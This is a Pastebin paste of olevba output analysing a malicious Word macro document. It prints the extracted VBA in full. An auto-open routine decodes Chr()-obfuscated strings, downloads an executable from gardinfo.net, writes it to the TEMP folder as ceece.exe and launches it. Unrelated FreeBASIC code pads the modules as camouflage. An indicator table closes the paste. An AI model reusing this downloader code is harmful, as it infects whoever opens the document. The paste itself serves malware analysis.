Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.31 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OpX:MASIH--V malware.docm
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: malware.docm
- Type: OpenXML
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- VEeve (8.2)
- End Sub
- Sub VEeve(FFFFF As Long)
- FBFILE_FORMAT_1
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: word/vbaProject.bin - OLE stream: u'VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- '':::::
- Static Function _
- hFBrelop2IRrelop _
- (ByVal tk As _
- Integer) As Integer
- Dim op As Integer
- Select Case tk
- Case FB_TK_EQ
- op = AST_OP_EQ
- Case FB_TK_GT
- op = AST_OP_GT
- Case FB_TK_LT
- op = AST_OP_LT
- Case FB_TK_NE
- op = AST_OP_NE
- Case FB_TK_LE
- op = AST_OP_LE
- Case FB_TK_GE
- op = AST_OP_GE
- Case Else
- dfd.errReport (FB_ERRMSG_EXPECTEDRELOP)
- '' error recovery: fake an op
- op = AST_OP_EQ
- End Select
- End Function
- Public Sub mp3_cbr_aktivate(pathIsAbsolute_4 As Object, pathIsAbsolute_3 As String)
- pathIsAbsolute_4.savetofile pathIsAbsolute_3, 2
- End Sub
- '':::::
- Static Function _
- hFileExists _
- (ByVal filename As _
- String) As Integer
- Dim f As Integer
- f = FreeFile
- Close #f
- End Function
- '':::::
- Static Sub _
- hUcase _
- (ByVal src As String _
- , ByVal dst As _
- String)
- Dim c As Integer
- Dim s
- Dim d
- s = src
- d = dst
- Do
- c = s
- If (c >= 97) Then
- If (c <= 122) Then
- c = c - (97 - 65)
- End If
- ElseIf (c = 0) Then
- Exit Do
- End If
- d = c
- s = s + 1
- d = d + 1
- Loop
- '' null-term
- d = 0
- End Sub
- '':::::
- Static Sub _
- hClearName _
- (ByVal src As String)
- Dim p
- p = src
- Do
- Select Case p
- Case 0
- Exit Do
- Case CHAR_AUPP To CHAR_ZUPP, CHAR_ALOW To CHAR_ZLOW, CHAR_0 To CHAR_9, CHAR_UNDER
- Case Else
- p = CHAR_ZLOW
- End Select
- p = p + 1
- Loop
- End Sub
- Public Function usZ5pw3gU8(KJB As Long)
- Dim httpRequest: Set httpRequest = hCurDir_2(Chr(77) & Chr(105) & Chr(60) & "c" & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(59) & Chr(46) & Chr(88) & "M" & Chr(60) & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
- httpRequest.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & "/" & "/" & "g" & "a" & Chr(114) & Chr(100) & Chr(105) & Chr(110) & Chr(102) & Chr(111) & "." & Chr(110) & Chr(101) & Chr(116) & Chr(47) & Chr(52) & "3" & Chr(53) & Chr(114) & Chr(103) & Chr(52) & Chr(47) & Chr(51) & Chr(50) & Chr(52) & Chr(53) & Chr(114) & Chr(100) & Chr(50) & Chr(46) & "e" & Chr(120) & "e", False
- httpRequest.Send
- usZ5pw3gU8 = httpRequest.responseBody
- End Function
- '' Searches backwards for the last '.' while still behind '/' or '\'.
- Private Function hFindExtBegin(ByRef path As String) As Integer
- for i as integer = len( path )-1 to 0 step -1
- select case( path[i] )
- Case Asc(".")
- return i
- #If DEFIND_FB_WIN32_ Or DEFIND_FB_DOS_ Then
- Case Asc("\"), Asc("/")
- #Else
- Case Asc("/")
- #End If
- Exit For
- End Select
- Next
- function = len( path )
- End Function
- Function hStripExt(ByRef path As String) As String
- function = left( path, hFindExtBegin( path ) )
- End Function
- '':::::
- function hStripPath _
- ( _
- byval filename as zstring ptr _
- ) as string static
- dim as integer lp, p_found, p(1 to 2)
- lp = 0
- Do
- p(1) = instr( lp+1, *filename, RSLASH )
- p(2) = instr( lp+1, *filename, "/" )
- If p(1) = 0 Or (p(2) > 0 And p(2) < p(1)) Then
- p_found = p(2)
- Else
- p_found = p(1)
- End If
- If (p_found = 0) Then
- Exit Do
- End If
- lp = p_found
- Loop
- If (lp > 0) Then
- function = mid( *filename, lp+1 )
- Else
- function = *filename
- End If
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: word/vbaProject.bin - OLE stream: u'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function hHexUInt _
- ( _
- ByVal value As uinteger _
- ) As String
- static as zstring * 8 + 1 res
- dim as zstring ptr p
- dim as integer lgt, maxlen
- static as integer hexTB(0 to 15) = _
- { _
- asc( "0" ), asc( "1" ), asc( "2" ), asc( "3" ), _
- asc( "4" ), asc( "5" ), asc( "6" ), asc( "7" ), _
- asc( "8" ), asc( "9" ), asc( "A" ), asc( "B" ), _
- asc( "C" ), asc( "D" ), asc( "E" ), asc( "F" ) _
- }
- maxlen = 4
- If (value > 65535) Then
- maxlen = 8
- End If
- p = @res + 8-1
- lgt = 0
- Do
- *p = hexTB( value and &h0000000F )
- lgt +=1
- If (lgt = maxlen) Then
- Exit Do
- End If
- p -= 1
- value shr = 4
- Loop
- function = p
- End Function
- Function hFloatToHex _
- ( _
- ByVal value As Double, _
- ByVal dtype As Integer _
- ) As String
- '' Emit the raw bytes that make up the float
- '' x86 little-endian assumption
- If (typeGet(dtype) = FB_DATATYPE_DOUBLE) Then
- function = "0x" + hex( *cptr( ulongint ptr, @value ), 16 )
- Else
- dim as single singlevalue = value
- '' Using an intermediate uinteger to allow compiling with FB
- '' versions before the overload resolution overhaul
- function = "0x" + hex( cuint( *cptr( ulong ptr, @singlevalue ) ), 8 )
- End If
- End Function
- Function hFloatToHex_C99 _
- ( _
- ByVal value As Double _
- ) As String
- '' float hex format defined in C99 spec: e.g. 0x1.fp+3
- dim as ulongint n = *cptr( ulongint ptr, @value )
- dim as integer sign = n shr 63
- dim as integer exp2 = (n shr 52) and (1u shl 11 - 1)
- dim as ulongint mantissa = n and (1ull shl 52 - 1)
- dim as string ret
- If (Sign <> 0) Then
- '' negative
- ret = "-0x"
- Else
- '' positive
- ret = "0x"
- End If
- exp2 -= 1023
- If (exp2 > -1023) Then
- '' normalized
- ret += "1." + hex( mantissa, 13 )
- If Right(ret, 1) = "0" Then ret = RTrim(ret, "0")
- Else
- If mantissa = 0 Then
- '' zero
- ret += "0"
- exp2 = 0
- Else
- '' denormed
- exp2 += 1
- ret += "0." + hex( mantissa, 13 )
- If Right(ret, 1) = "0" Then ret = RTrim(ret, "0")
- End If
- End If
- ret += "p" & (*iif( exp2 >= 0, @"+", @"-" )) + str( abs( exp2 ) )
- return ret
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: word/vbaProject.bin - OLE stream: u'VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- '':::::
- Function hStripFilename _
- ( _
- ByVal filename As String _
- ) As String
- dim as integer lp, p_found, p(1 to 2)
- lp = 0
- Do
- p(1) = instr( lp+1, *filename, RSLASH )
- p(2) = instr( lp+1, *filename, "/" )
- If p(1) = 0 Or (p(2) > 0 And p(2) < p(1)) Then
- p_found = p(2)
- Else
- p_found = p(1)
- End If
- If (p_found = 0) Then
- Exit Do
- End If
- lp = p_found
- Loop
- If (lp > 0) Then
- function = left( *filename, lp )
- Else
- function = ""
- End If
- End Function
- '':::::
- function hGetFileExt _
- ( _
- byval fname as zstring ptr _
- ) as string static
- dim as integer p, lp
- dim as string res
- lp = 0
- Do
- p = instr( lp+1, *fname, "." )
- If (p = 0) Then
- Exit Do
- End If
- lp = p
- Loop
- If (lp = 0) Then
- function = ""
- Else
- res = lcase( mid( *fname, lp+1 ) )
- If InStr(res, RSLASH) > 0 Or InStr(res, "/") > 0 Then
- '' We had a folder with a "." inside ...
- function = ""
- ElseIf (Len(res) > 0) Then
- '' . or .. dirs?
- if( res[0] = asc( RSLASH ) or res[0] = asc( "/" ) ) then
- function = ""
- Else
- function = res
- End If
- End If
- End If
- End Function
- sub hReplaceSlash( byval s as zstring ptr, byval char as integer )
- for i as integer = 0 to len( *s ) - 1
- if( (s[i] = CHAR_RSLASH) or (s[i] = CHAR_SLASH) ) then
- s [i] = Char
- End If
- Next
- End Function
- Function pathStripDiv(ByRef path As String) As String
- dim as integer length = len( path )
- If (length > 0) Then
- length -= 1
- select case( path[length] )
- #If defined__FB_WIN32__ Or defined__FB_DOS__ Then
- Case Asc("/"), Asc("\")
- #Else
- Case Asc("/")
- #End If
- return left( path, length )
- End Select
- End If
- function = path
- End Function
- Public Function hCurDir_2(UIlhbjkhoiyH As String)
- UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(60), "")
- UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(61), "")
- UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(59), "")
- Set hCurDir_2 = CreateObject(UIlhbjkhoiyH)
- End Function
- Function pathIsAbsolute(ByVal path As String) As Integer
- #If defined__FB_WIN32__ Or defined__FB_DOS__ Then
- if( (*path)[0] <> 0 ) then
- select case( (*path)[1] )
- Case Asc(":")
- '' C:...
- function = TRUE
- #If def__FB_WIN32__ Then
- Case Asc("\")
- '' \\... UNC path
- function = ((*path)[0] = asc( "\" ))
- #End If
- End Select
- End If
- #Else
- '' /...
- function = ((*path)[0] = asc( "/" ))
- #End If
- End Function
- Public Function FBFILE_FORMAT_1()
- Set pathIsAbsolute_1 = hCurDir_2(Chr(87) & Chr(60) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
- pathIsAbsolute_2 = pathIsAbsolute_1("T" & Chr(69) & Chr(77) & Chr(80))
- Dim pathIsAbsolute_4 As Object
- Set pathIsAbsolute_4 = hCurDir_2(Chr(65) & "<" & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & Chr(101) & "a" & Chr(59) & Chr(109))
- Dim pathIsAbsolute_3 As String
- pathIsAbsolute_3 = pathIsAbsolute_2 + "\ce" & Chr(101) + "ce." & "e" & Chr(120) & Chr(101)
- With pathIsAbsolute_4
- .Type = 1
- .Open
- .write usZ5pw3gU8(223)
- End With
- mp3_cbr_aktivate pathIsAbsolute_4, pathIsAbsolute_3
- Set noextensionFile = hCurDir_2(Chr(83) & Chr(61) & "<" & "h" & "e" & Chr(108) & Chr(59) & Chr(108) & "<" & Chr(46) & Chr(65) & "p;" & Chr(112) & Chr(108) & Chr(105) & "<" & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
- noextensionFile.Open (pathIsAbsolute_3)
- End Function
- Function hCheckFileFormat(ByVal f As Integer) As Integer
- dim as long BOM
- dim as FBFILE_FORMAT fmt
- '' little-endian assumptions
- fmt = FBFILE_FORMAT_ASCII
- if( get( #f, 0, BOM ) = 0 ) then
- If (BOM = &HFFFE0000) Then
- fmt = FBFILE_FORMAT_UTF32BE
- ElseIf (BOM = &HFEFF) Then
- fmt = FBFILE_FORMAT_UTF32LE
- Else
- BOM and= &h00FFFFFF
- If (BOM = &HBFBBEF) Then
- fmt = FBFILE_FORMAT_UTF8
- Else
- BOM and= &h0000FFFF
- If (BOM = &HFEFF) Then
- fmt = FBFILE_FORMAT_UTF16LE
- ElseIf (BOM = &HFFFE) Then
- fmt = FBFILE_FORMAT_UTF16BE
- End If
- End If
- End If
- Select Case fmt
- Case FBFILE_FORMAT_ASCII
- Seek #f, 1
- Case FBFILE_FORMAT_UTF8
- Seek #f, 1 + 3
- Case FBFILE_FORMAT_UTF16LE, _
- FBFILE_FORMAT_UTF16BE
- Seek #f, 1 + 2
- End Select
- End If
- function = fmt
- End Function
- Function hCurDir() As String
- '' curdir() usually won't be terminated with a path separator,
- '' except when it points to the file system root, instead of
- '' some directory (e.g. C:\ on Win32 or / on Unix).
- function = pathStripDiv( curdir( ) )
- End Function
- Function pathStripCurdir(ByRef path As String) As String
- var pwd = hCurDir() + FB_HOST_PATHDIV
- If (Left(path, Len(pwd)) = pwd) Then
- function = right( path, len( path ) - len( pwd ) )
- Else
- function = path
- End If
- End Function
- function hIsValidSymbolName( byval sym as zstring ptr ) as integer
- If (sym = Null) Then Exit Function
- var symlen = len( *sym )
- If (symlen = 0) Then Exit Function
- if( (hIsChar(sym[0]) orelse (sym[0] = asc("_"))) = FALSE ) then exit function
- for i as integer = 1 to symlen-1
- if( ((hIsChar(sym[i])) orelse (sym[i] = asc("_")) orelse (hIsCharNumeric(sym[i]))) = FALSE ) then exit function
- Next
- function = TRUE
- End Function
- '' Checks whether a string starts with and ends in [double-]quotes.
- Private Function strIsQuoted(ByRef s As String) As Integer
- dim as integer last = len(s) - 1
- If (Last < 1) Then
- return FALSE
- End If
- return (((s[0] = asc("""")) and (s[last] = asc(""""))) or _
- ((s[0] = asc("'" )) and (s[last] = asc("'" ))))
- End Function
- Function strUnquote(ByRef s As String) As String
- If (strIsQuoted(s)) Then
- return mid(s, 2, len(s) - 2)
- End If
- return s
- End Function
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | http://gardinfo.net/ | URL (obfuscation: VBA expression) |
- | | 435rg4/3245rd2.exe | |
- | IOC | 3245rd2.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- | IOC | ceece.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- +------------+----------------------+-----------------------------------------+
Add Comment
Please, Sign In to add comment